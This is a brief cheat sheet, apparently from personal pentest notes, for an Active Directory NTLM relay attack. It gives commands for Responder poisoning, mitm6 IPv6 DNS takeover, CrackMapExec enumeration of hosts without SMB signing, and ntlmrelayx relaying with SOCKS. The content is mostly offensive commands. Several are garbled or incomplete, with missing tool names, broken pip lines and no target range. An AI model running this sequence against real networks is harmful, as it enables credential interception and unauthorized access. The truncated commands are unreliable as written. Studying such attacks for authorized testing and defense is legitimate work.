AD Attacks

1 - Running Responder

./ -I eth0

2 - Mitm6 (run simeltaneous to Responder)

mitm6 -i eth0

3 - CrackMapExec

Install first

sudo add-apt-repository ppa:deadsnakes/ppa 
sudo apt update 
sudo apt install python3.8 python3.8-dev python3.8-venv 
python3.8 -m venv python3.8-venv 
source python3.8-venv/bin/activate 
pip install --upgrade 
pip pip3 install crackmapexec

Run with 1 and 2 to grab Hosts with SMB signing as false:

crackmapexec smb --gen-relay-list relay-hosts.txt | grep "False"

4 - Run Mitm6

mitm6 -d evil.corp

5 - Run Ntlmrelayx with Mitm6

Run with 5 together for relays: -6 -socks -smb2support -tf relay-hosts.txt

Last updated